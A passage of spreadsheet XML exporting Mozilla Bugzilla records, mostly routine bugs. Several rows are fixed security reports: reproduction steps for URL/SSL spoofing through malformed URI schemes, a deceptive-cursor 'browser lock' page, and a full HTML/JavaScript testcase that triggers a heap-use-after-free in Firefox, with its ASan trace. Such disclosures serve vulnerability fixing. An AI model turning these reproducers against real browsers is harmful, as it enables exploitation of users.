        <v>5</v>
      </c>
      <c r="H3283" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3283" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3283" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K3283" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3283" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3283" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3283" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3283" t="inlineStr">
        <is>
          <t>[releases][automation][updates]</t>
        </is>
      </c>
      <c r="Q3283" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3283" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3283" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3283" t="n">
        <v>1</v>
      </c>
      <c r="U3283" t="n">
        <v>0</v>
      </c>
      <c r="V3283" t="n">
        <v>3</v>
      </c>
      <c r="W3283" t="inlineStr">
        <is>
          <t>update verify dumper was called without passing --channel esrtest</t>
        </is>
      </c>
      <c r="X3283" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3284">
      <c r="A3284" t="n">
        <v>1162372</v>
      </c>
      <c r="B3284" t="inlineStr">
        <is>
          <t>2015-05-06 21:42:18 -0700</t>
        </is>
      </c>
      <c r="C3284" t="inlineStr">
        <is>
          <t>Custom URI schemes in the location bar can lead to URL &amp; SSL spoofing</t>
        </is>
      </c>
      <c r="D3284" t="inlineStr">
        <is>
          <t>2024-05-30 09:00:56 -0700</t>
        </is>
      </c>
      <c r="E3284" t="n">
        <v>1</v>
      </c>
      <c r="F3284" t="n">
        <v>1</v>
      </c>
      <c r="G3284" t="n">
        <v>6</v>
      </c>
      <c r="H3284" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3284" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3284" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3284" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L3284" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3284" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3284" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3284" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q3284" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3284" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3284" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T3284" t="n">
        <v>1</v>
      </c>
      <c r="U3284" t="n">
        <v>0</v>
      </c>
      <c r="V3284" t="n">
        <v>80</v>
      </c>
      <c r="W3284" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Build ID: 20150415140819
Steps to reproduce:
Copy a wrong URL format address like : secure://www.google.com or httpZ://www.google.com , past it in the location bar (just past it for the moment), and after try to go on this wrong URL lead to URL and SSL spoofing (the url of the malicious website is changed by secure://www.google.com and if the malicious website have a valid SSL , the wrong URL appear to be secure like a website with SSL connexion).
-1 : copy a wrong URL format like httpZ://www.google.com and past it on the location bar
-2 : after past this wrong URL , try to go on this address
Actual results:
The location bar show the wrong URL format address (httpZ://www.google.com) and if the website where you copy/past this address have a valid SSL connexion , the wrong URL address appear like secured like a website with SSL.
Expected results:
The location bar show the wrong URL format address (httpZ://www.google.com).
The wrong URL address can appear like secured like a website with SSL.</t>
        </is>
      </c>
      <c r="X3284" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3285">
      <c r="A3285" t="n">
        <v>1648333</v>
      </c>
      <c r="B3285" t="inlineStr">
        <is>
          <t>2020-06-24 20:56:02 -0700</t>
        </is>
      </c>
      <c r="C3285" t="inlineStr">
        <is>
          <t>Deceptive custom cursor and infinite JavaScript loop causes Browser Lock effect</t>
        </is>
      </c>
      <c r="D3285" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:06 -0800</t>
        </is>
      </c>
      <c r="E3285" t="n">
        <v>1</v>
      </c>
      <c r="F3285" t="n">
        <v>1</v>
      </c>
      <c r="G3285" t="n">
        <v>3</v>
      </c>
      <c r="H3285" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3285" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3285" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3285" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3285" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3285" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3285" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3285" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main79+][adv-ESR78.1+]</t>
        </is>
      </c>
      <c r="Q3285" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3285" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3285" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T3285" t="n">
        <v>1</v>
      </c>
      <c r="U3285" t="n">
        <v>0</v>
      </c>
      <c r="V3285" t="n">
        <v>19</v>
      </c>
      <c r="W3285" t="inlineStr">
        <is>
          <t>Created attachment 9159137
demonstration video
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36
Steps to reproduce:
1. Host index.html and cursor.png in the same directory
2. Navigate to index.html
3. Move mouse around until custom cursor is loaded
4. Move mouse over "hover here" until the text turns to "ok"
5. Try to click Back/Close Tab buttons
6. Try to click "Stop It" when the "A web page is slowing down..." doorhanger notification pops up
Actual results:
Browser Lock effect: buttons are seemingly not clickable, website is not easy to get away from
Expected results:
Custom cursor should not be active near browser Back/Close Tab buttons, or the "A web page is slowing down..." notification</t>
        </is>
      </c>
      <c r="X3285" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3286">
      <c r="A3286" t="n">
        <v>1068572</v>
      </c>
      <c r="B3286" t="inlineStr">
        <is>
          <t>2014-09-17 04:24:31 -0700</t>
        </is>
      </c>
      <c r="C3286" t="inlineStr">
        <is>
          <t>Implement KB dashboard changes</t>
        </is>
      </c>
      <c r="D3286" t="inlineStr">
        <is>
          <t>2014-10-15 09:58:16 -0700</t>
        </is>
      </c>
      <c r="E3286" t="n">
        <v>1</v>
      </c>
      <c r="F3286" t="n">
        <v>1</v>
      </c>
      <c r="G3286" t="n">
        <v>5</v>
      </c>
      <c r="H3286" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3286" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3286" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3286" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3286" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3286" t="inlineStr">
        <is>
          <t>u=contributor c=wiki p=3 s=2014.17</t>
        </is>
      </c>
      <c r="Q3286" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3286" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3286" t="inlineStr">
        <is>
          <t>2014Q3</t>
        </is>
      </c>
      <c r="T3286" t="n">
        <v>1</v>
      </c>
      <c r="U3286" t="n">
        <v>0</v>
      </c>
      <c r="V3286" t="n">
        <v>11</v>
      </c>
      <c r="W3286" t="inlineStr">
        <is>
          <t>Implement "expiry date" and "% change" fields for revisions and update the KB dashboard as outlined in bug 1061773.
This is the google doc for reference:
https://docs.google.com/a/mozilla.com/spreadsheet/ccc?key=0Amy0OSD97CR6dHVaZ1VNTXRvV2U0aUlrTjRiRC03V0E&amp;usp=drive_web#gid=0</t>
        </is>
      </c>
      <c r="X3286" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3287">
      <c r="A3287" t="n">
        <v>1354536</v>
      </c>
      <c r="B3287" t="inlineStr">
        <is>
          <t>2017-04-07 06:27:36 -0700</t>
        </is>
      </c>
      <c r="C3287" t="inlineStr">
        <is>
          <t>Add a 'Recent Activity' list to the Library panel</t>
        </is>
      </c>
      <c r="D3287" t="inlineStr">
        <is>
          <t>2020-06-17 16:38:00 -0700</t>
        </is>
      </c>
      <c r="E3287" t="n">
        <v>1</v>
      </c>
      <c r="F3287" t="n">
        <v>1</v>
      </c>
      <c r="G3287" t="n">
        <v>2</v>
      </c>
      <c r="H3287" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3287" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3287" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K3287" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3287" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3287" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3287" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3287" t="inlineStr">
        <is>
          <t>[reserve-photon-structure]</t>
        </is>
      </c>
      <c r="Q3287" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3287" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3287" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3287" t="n">
        <v>1</v>
      </c>
      <c r="U3287" t="n">
        <v>2</v>
      </c>
      <c r="V3287" t="n">
        <v>46</v>
      </c>
      <c r="W3287" t="inlineStr">
        <is>
          <t>This is a newly created list that features one of the following two options (TBD):
1. A list of recently bookmarked items, mixed with recently downloaded items, sorted by date. Clicking these items will activate the appropriate command as if they were in the 'Recent Bookmarks' menu or 'Downloads' lists.
2. A list obtained from Activity Stream, as-is.
It is, of course, possible to first implement 1) and go for 2) when and after the Activity Stream project is fully integrated into Fx.</t>
        </is>
      </c>
      <c r="X3287" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3288">
      <c r="A3288" t="n">
        <v>912534</v>
      </c>
      <c r="B3288" t="inlineStr">
        <is>
          <t>2013-09-04 08:28:01 -0700</t>
        </is>
      </c>
      <c r="C3288" t="inlineStr">
        <is>
          <t>SpiderMonkey: SPS Profiler segfault</t>
        </is>
      </c>
      <c r="D3288" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:47 -0800</t>
        </is>
      </c>
      <c r="E3288" t="n">
        <v>1</v>
      </c>
      <c r="F3288" t="n">
        <v>1</v>
      </c>
      <c r="G3288" t="n">
        <v>3</v>
      </c>
      <c r="H3288" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3288" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3288" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3288" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3288" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3288" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3288" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3288" t="inlineStr">
        <is>
          <t>[adv-main25+]</t>
        </is>
      </c>
      <c r="Q3288" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3288" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3288" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3288" t="n">
        <v>1</v>
      </c>
      <c r="U3288" t="n">
        <v>0</v>
      </c>
      <c r="V3288" t="n">
        <v>17</v>
      </c>
      <c r="W3288" t="inlineStr">
        <is>
          <t>The following test cases crashes on trunk JS shell with '--ion-eager':
function f() {}
enableSPSProfilingAssertions(false);
for (var i = 0; i &lt; 10; i++)
    f();
What's happening is that we are bailing from Ion into Baseline, with no profile stack entry.  Then the code OSRs into a profiling-enabled Ion compilation, which uses the nonexistant stack entry.
We should not OSR from baseline to Ion when the presence or lack of an profiler entry for the baseline frame doesn't match up with the Ion code's expectations.</t>
        </is>
      </c>
      <c r="X3288" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3289">
      <c r="A3289" t="n">
        <v>1397224</v>
      </c>
      <c r="B3289" t="inlineStr">
        <is>
          <t>2017-09-06 03:07:35 -0700</t>
        </is>
      </c>
      <c r="C3289" t="inlineStr">
        <is>
          <t>Heroku deployments failing during yarn build with "EROFS: read-only file system, access '/usr/local/bin'"</t>
        </is>
      </c>
      <c r="D3289" t="inlineStr">
        <is>
          <t>2017-09-06 07:58:04 -0700</t>
        </is>
      </c>
      <c r="E3289" t="n">
        <v>1</v>
      </c>
      <c r="F3289" t="n">
        <v>1</v>
      </c>
      <c r="G3289" t="n">
        <v>7</v>
      </c>
      <c r="H3289" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3289" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3289" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3289" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3289" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3289" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3289" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3289" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3289" t="inlineStr"/>
      <c r="Q3289" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3289" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3289" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3289" t="n">
        <v>1</v>
      </c>
      <c r="U3289" t="n">
        <v>0</v>
      </c>
      <c r="V3289" t="n">
        <v>3</v>
      </c>
      <c r="W3289" t="inlineStr">
        <is>
          <t>For example:
https://dashboard.heroku.com/apps/treeherder-stage/activity/builds/ec63f24f-7f6c-4cd7-b3d2-224a3dda6da4
"""
-----&gt; Running post-compile hook
yarn build v1.0.0
$ ./node_modules/neutrino/bin/neutrino build --presets ./neutrino-custom/production.js
error An unexpected error occurred: "EROFS: read-only file system, access '/usr/local/bin'".
"""</t>
        </is>
      </c>
      <c r="X3289" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3290">
      <c r="A3290" t="n">
        <v>1155328</v>
      </c>
      <c r="B3290" t="inlineStr">
        <is>
          <t>2015-04-16 11:54:46 -0700</t>
        </is>
      </c>
      <c r="C3290" t="inlineStr">
        <is>
          <t>OffThreadScriptReceiverCallback releases objects off the main thread when NS_DispatchToMainThread() fails</t>
        </is>
      </c>
      <c r="D3290" t="inlineStr">
        <is>
          <t>2017-01-05 09:03:08 -0800</t>
        </is>
      </c>
      <c r="E3290" t="n">
        <v>1</v>
      </c>
      <c r="F3290" t="n">
        <v>1</v>
      </c>
      <c r="G3290" t="n">
        <v>3</v>
      </c>
      <c r="H3290" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3290" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3290" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3290" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3290" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3290" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3290" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3290" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+]</t>
        </is>
      </c>
      <c r="Q3290" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3290" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3290" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T3290" t="n">
        <v>1</v>
      </c>
      <c r="U3290" t="n">
        <v>0</v>
      </c>
      <c r="V3290" t="n">
        <v>11</v>
      </c>
      <c r="W3290" t="inlineStr">
        <is>
          <t>I found this on crash-stats.  It is similar to bug 1117977.
https://crash-stats.mozilla.com/report/index/abc9524f-81ad-4985-b15e-029d22150412
I think what is happening is that we call OffThreadScriptReceiverCallback (in nsXULElement.cpp), which creates a new runnable that has a strong reference to a mainthread only object, then NS_DispatchToMainThread() fails because we're late in shutdown, so we exit and destroy the runnable, which destroys the mainthread object.</t>
        </is>
      </c>
      <c r="X3290" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3291">
      <c r="A3291" t="n">
        <v>82306</v>
      </c>
      <c r="B3291" t="inlineStr">
        <is>
          <t>2001-05-22 23:24:46 -0700</t>
        </is>
      </c>
      <c r="C3291" t="inlineStr">
        <is>
          <t>JS URI method impurity</t>
        </is>
      </c>
      <c r="D3291" t="inlineStr">
        <is>
          <t>2002-01-18 00:39:55 -0800</t>
        </is>
      </c>
      <c r="E3291" t="n">
        <v>1</v>
      </c>
      <c r="F3291" t="n">
        <v>1</v>
      </c>
      <c r="G3291" t="n">
        <v>3</v>
      </c>
      <c r="H3291" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3291" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3291" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3291" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3291" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3291" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3291" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3291" t="inlineStr"/>
      <c r="Q3291" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3291" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3291" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T3291" t="n">
        <v>1</v>
      </c>
      <c r="U3291" t="n">
        <v>0</v>
      </c>
      <c r="V3291" t="n">
        <v>13</v>
      </c>
      <c r="W3291" t="inlineStr">
        <is>
          <t>Testcase attachment coming up, courtesy Mike Epstein &lt;epstein@tellme.com&gt;.
/be</t>
        </is>
      </c>
      <c r="X3291" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3292">
      <c r="A3292" t="n">
        <v>1340186</v>
      </c>
      <c r="B3292" t="inlineStr">
        <is>
          <t>2017-02-16 08:15:44 -0800</t>
        </is>
      </c>
      <c r="C3292" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsFrameManagerBase::UndisplayedMap::RemoveNodeFor</t>
        </is>
      </c>
      <c r="D3292" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:26 -0700</t>
        </is>
      </c>
      <c r="E3292" t="n">
        <v>1</v>
      </c>
      <c r="F3292" t="n">
        <v>1</v>
      </c>
      <c r="G3292" t="n">
        <v>3</v>
      </c>
      <c r="H3292" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3292" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3292" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K3292" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3292" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3292" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3292" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3292" t="inlineStr">
        <is>
          <t>[fixed by cover bug 1341137][post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q3292" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3292" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3292" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T3292" t="n">
        <v>1</v>
      </c>
      <c r="U3292" t="n">
        <v>0</v>
      </c>
      <c r="V3292" t="n">
        <v>19</v>
      </c>
      <c r="W3292" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest asan build of Firefox.
&lt;script&gt;
function start() {
        o0=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o0.src='data:text/html,&lt;html&gt;&lt;body&gt;&lt;table&gt;&lt;tr&gt;&lt;td id=fo&gt;xxx&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;';
        o0.addEventListener('load', fun1,false);
        document.body.appendChild(o0);
        o1=window.document;
}
var called=0;
function fun1() {
        if(called++)return;
        o4=o0.contentDocument;
        o38=o4.getElementById('fo');
        o107=document.getSelection();
        o4.designMode='on';
        o213=new Blob([document.documentElement], {'type': 'text/html'});
        o0.src=window.URL.createObjectURL(o213);
        o1.designMode='on';
        o379=document.createElementNS('http://www.w3.org/1999/xhtml','textarea');
        o0.appendChild(o379);
        o462=document.createRange();
        o462.selectNode(o38);
        o107.addRange(o462);
        try{o1.execCommand('insertunorderedlist',false,null);}catch(e){}
        window.setTimeout(fun2, 4);
}
function fun2() {
        window.fuzzPriv.CC();window.fuzzPriv.GC();window.fuzzPriv.CC();
        window.setTimeout("location.reload()",500);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
=================================================================
==24376==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250003dd140 at pc 0x7fd00d89be4f bp 0x7ffc760e1470 sp 0x7ffc760e1468
READ of size 8 at 0x6250003dd140 thread T0 (Web Content)
    #0 0x7fd00d89be4e in RemoveChild /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:343:10
    #1 0x7fd00d89be4e in nsStyleContext::~nsStyleContext() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:212
    #2 0x7fd00d8a6610 in nsStyleContext::Destroy() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1350:3
    #3 0x7fd00dabf6c3 in Release /home/worker/workspace/build/src/layout/style/nsStyleContext.h:130:7
    #4 0x7fd00dabf6c3 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
    #5 0x7fd00dabf6c3 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:394
    #6 0x7fd00dabf6c3 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:78
    #7 0x7fd00dabf6c3 in mozilla::UndisplayedNode::~UndisplayedNode() /home/worker/workspace/build/src/layout/base/nsFrameManager.h:57
    #8 0x7fd00dabeb08 in nsFrameManagerBase::UndisplayedMap::RemoveNodeFor(nsIContent*, mozilla::UndisplayedNode*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:794:3
    #9 0x7fd00da77a25 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags, bool*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8320:5
    #10 0x7fd00d9d1f22 in mozilla::PresShell::ContentRemoved(nsIDocument*, nsIContent*, nsIContent*, int, nsIContent*) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4519:3
    #11 0x7fd00d4044ed in mozilla::HTMLEditor::DeleteRefToAnonymousNode(nsIContent*, nsIContent*, nsIPresShell*) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:298:7
    #12 0x7fd00d4078cf in RemoveListenerAndDeleteRef /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:263:3
    #13 0x7fd00d4078cf in mozilla::HTMLEditor::HideResizers() /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:429
    #14 0x7fd00d4967df in HideAnonymousEditingUIs /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:187:5
    #15 0x7fd00d4967df in mozilla::HTMLEditor::PreDestroy(bool) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:341
    #16 0x7fd00ff98cb9 in TearDownEditor /home/worker/workspace/build/src/docshell/base/nsDocShellEditorData.cpp:35:5
    #17 0x7fd00ff98cb9 in nsDocShellEditorData::~nsDocShellEditorData() /home/worker/workspace/build/src/docshell/base/nsDocShellEditorData.cpp:28
    #18 0x7fd00ffc8b0e in assign /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:45:5
    #19 0x7fd00ffc8b0e in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:129
    #20 0x7fd00ffc8b0e in nsSHEntryShared::DropPresentationState() /home/worker/workspace/build/src/docshell/shistory/nsSHEntryShared.cpp:173
    #21 0x7fd00ffc6d66 in SyncPresentationState /home/worker/workspace/build/src/docshell/shistory/nsSHEntryShared.cpp:147:3
    #22 0x7fd00ffc6d66 in nsSHEntry::SyncPresentationState() /home/worker/workspace/build/src/docshell/shistory/nsSHEntry.cpp:848
    #23 0x7fd00ff5d6c3 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9413:5
    #24 0x7fd00ff5c079 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7247:17
    #25 0x7fd00feeeb36 in nsDocShell::CreateContentViewer(nsACString_internal const&amp;, nsIRequest*, nsIStreamListener**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9236:3
    #26 0x7fd00feebb0a in nsDSURIContentListener::DoContent(nsACString_internal const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /home/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:128:10
    #27 0x7fd008a9010d in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:736:17
    #28 0x7fd008a8c82e in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:414:30
    #29 0x7fd008a8b7a0 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:277:8
    #30 0x7fd00721525b in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:813:14
    #31 0x7fd00726131e in nsInputStreamPump::OnStateStart() /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:524:14
    #32 0x7fd007260853 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:426:25
    #33 0x7fd00705194d in nsInputStreamReadyEvent::Run() /home/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:96:9
    #34 0x7fd0070b4f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #35 0x7fd0070b1850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #36 0x7fd007ec6acf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
